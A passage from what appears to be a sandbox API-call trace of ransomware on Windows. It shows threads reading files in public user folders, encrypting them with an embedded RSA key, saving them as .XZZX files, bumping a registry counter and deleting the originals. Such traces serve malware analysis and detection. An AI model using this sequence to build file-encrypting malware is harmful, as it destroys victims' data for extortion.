dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11758) returned 1 [0141.800] CryptExportKey (in: hKey=0x3d11758, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0141.800] CryptExportKey (in: hKey=0x3d11758, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0141.800] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.800] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0141.800] CryptDestroyKey (hKey=0x3d11758) returned 1 [0141.800] CryptReleaseContext (hProv=0x4378f30, dwFlags=0x0) returned 0 [0141.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\50C930C63ECF303723410A464304147F.XZZX" (normalized: "c:\\users\\public\\libraries\\50c930c63ecf303723410a464304147f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x878 [0141.861] WriteFile (in: hFile=0x878, lpBuffer=0x3a4670*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3a4670*, lpNumberOfBytesWritten=0x434e438*=0x58, lpOverlapped=0x0) returned 1 [0141.862] SetFilePointer (in: hFile=0x878, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x58 [0141.862] WriteFile (in: hFile=0x878, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.862] SetFilePointer (in: hFile=0x878, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d [0141.862] WriteFile (in: hFile=0x878, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0141.863] SetFilePointer (in: hFile=0x878, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x73 [0141.863] WriteFile (in: hFile=0x878, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.863] SetFilePointer (in: hFile=0x878, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x78 [0141.863] SetErrorMode (uMode=0x1) returned 0x1 [0141.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0141.863] OutputDebugStringW (lpOutputString="end") [0141.863] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.863] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0141.863] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x43790c8) returned 1 [0141.864] CryptImportPublicKeyInfo (in: hCryptProv=0x43790c8, dwCertEncodingType=0x1, pInfo=0x3cf2070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf20a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf20a8*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11758) returned 1 [0141.864] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.865] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0141.865] CryptEncrypt (in: hKey=0x3d11758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0141.865] CryptEncrypt (in: hKey=0x3d11758, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379150*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379150*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0141.865] WriteFile (in: hFile=0x878, lpBuffer=0x4379150*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4379150*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0141.865] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0141.865] WriteFile (in: hFile=0x878, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.865] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0141.865] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0141.865] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x87c) returned 0x0 [0141.866] RegQueryValueExW (in: hKey=0x87c, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xc8, lpcbData=0x434dfdc*=0x4) returned 0x0 [0141.866] RegCloseKey (hKey=0x87c) returned 0x0 [0141.866] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x87c) returned 0x0 [0141.866] RegSetValueExW (in: hKey=0x87c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xc9, cbData=0x4 | out: lpData=0x434dfec*=0xc9) returned 0x0 [0141.866] RegCloseKey (hKey=0x87c) returned 0x0 [0141.866] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.866] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.867] CloseHandle (hObject=0x878) returned 1 [0141.867] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0141.868] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0141.868] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini")) returned 1 [0141.869] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini")) returned 0 Thread: id = 505 os_tid = 0xb44 [0141.638] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.638] lstrcpyW (in: lpString1=0x420f460, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0141.638] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0141.638] SetErrorMode (uMode=0x1) returned 0x1 [0141.638] lstrcpyW (in: lpString1=0x420f860, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0141.638] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x59c03323, Data2=0x29c1, Data3=0x4432, Data4=([0]=0x86, [1]=0x50, [2]=0x10, [3]=0x59, [4]=0x4d, [5]=0x51, [6]=0x4e, [7]=0x49))) returned 0x0 [0141.638] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0141.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0141.638] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\721728630B1F6BB259C033230F404FFA.XZZX") returned 67 [0141.638] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="XZZX") returned 0x0 [0141.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x20) returned 1 [0141.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.639] ReadFile (in: hFile=0x854, lpBuffer=0x3cbcfc8, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cbcfc8*, lpNumberOfBytesRead=0x420e418*=0x36c, lpOverlapped=0x0) returned 1 [0141.640] CloseHandle (hObject=0x854) returned 1 [0141.640] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0141.640] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0141.641] SetErrorMode (uMode=0x1) returned 0x1 [0141.641] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0141.641] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4378f30) returned 1 [0141.644] CryptGenKey (in: hProv=0x4378f30, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d117d8) returned 1 [0141.846] CryptExportKey (in: hKey=0x3d117d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.846] CryptExportKey (in: hKey=0x3d117d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.846] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.847] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0141.847] CryptDestroyKey (hKey=0x3d117d8) returned 1 [0141.847] CryptReleaseContext (hProv=0x4378f30, dwFlags=0x0) returned 0 [0141.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\721728630B1F6BB259C033230F404FFA.XZZX" (normalized: "c:\\users\\public\\libraries\\721728630b1f6bb259c033230f404ffa.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.848] WriteFile (in: hFile=0x854, lpBuffer=0x3cbcfc8*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cbcfc8*, lpNumberOfBytesWritten=0x420e438*=0x36c, lpOverlapped=0x0) returned 1 [0141.849] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x36c [0141.849] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.849] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x371 [0141.849] WriteFile (in: hFile=0x854, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2a, lpOverlapped=0x0) returned 1 [0141.849] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x39b [0141.849] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.849] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3a0 [0141.849] SetErrorMode (uMode=0x1) returned 0x1 [0141.849] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0141.849] OutputDebugStringW (lpOutputString="end") [0141.850] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.850] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0141.850] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x4378fb8) returned 1 [0141.850] CryptImportPublicKeyInfo (in: hCryptProv=0x4378fb8, dwCertEncodingType=0x1, pInfo=0x3cf23b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf23e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf23e8*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d117d8) returned 1 [0141.850] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.851] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0141.851] CryptEncrypt (in: hKey=0x3d117d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0141.851] CryptEncrypt (in: hKey=0x3d117d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379040*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379040*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0141.851] WriteFile (in: hFile=0x854, lpBuffer=0x4379040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4379040*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0141.851] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0141.851] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.851] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0141.852] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0141.852] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x878) returned 0x0 [0141.852] RegQueryValueExW (in: hKey=0x878, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xc7, lpcbData=0x420dfdc*=0x4) returned 0x0 [0141.852] RegCloseKey (hKey=0x878) returned 0x0 [0141.852] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x878) returned 0x0 [0141.852] RegSetValueExW (in: hKey=0x878, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xc8, cbData=0x4 | out: lpData=0x420dfec*=0xc8) returned 0x0 [0141.852] RegCloseKey (hKey=0x878) returned 0x0 [0141.852] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.853] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.853] CloseHandle (hObject=0x854) returned 1 [0141.854] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0141.854] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0141.854] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms")) returned 1 [0141.855] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms")) returned 0 Thread: id = 506 os_tid = 0xb48 [0141.870] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.870] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.870] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\" [0141.870] SetErrorMode (uMode=0x1) returned 0x1 [0141.870] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.870] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xce952baa, Data2=0x906d, Data3=0x4585, Data4=([0]=0x9b, [1]=0x69, [2]=0x5f, [3]=0x58, [4]=0x89, [5]=0x71, [6]=0xc0, [7]=0x9a))) returned 0x0 [0141.870] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0141.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0141.870] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\DE133762273869A1CE952BAA2B594DE9.XZZX") returned 63 [0141.870] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0141.870] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x20) returned 1 [0141.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x86c [0141.870] ReadFile (in: hFile=0x86c, lpBuffer=0x4362808, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4362808*, lpNumberOfBytesRead=0x420e418*=0x17c, lpOverlapped=0x0) returned 1 [0141.871] CloseHandle (hObject=0x86c) returned 1 [0141.871] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0141.871] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0141.872] SetErrorMode (uMode=0x1) returned 0x1 [0141.872] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0141.872] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43791d8) returned 1 [0141.876] CryptGenKey (in: hProv=0x43791d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11858) returned 1 [0142.147] CryptExportKey (in: hKey=0x3d11858, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0142.147] CryptExportKey (in: hKey=0x3d11858, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0142.147] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0142.148] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0142.148] CryptDestroyKey (hKey=0x3d11858) returned 1 [0142.148] CryptReleaseContext (hProv=0x43791d8, dwFlags=0x0) returned 1 [0142.148] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\DE133762273869A1CE952BAA2B594DE9.XZZX" (normalized: "c:\\users\\public\\music\\de133762273869a1ce952baa2b594de9.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0142.184] WriteFile (in: hFile=0x884, lpBuffer=0x4362808*, 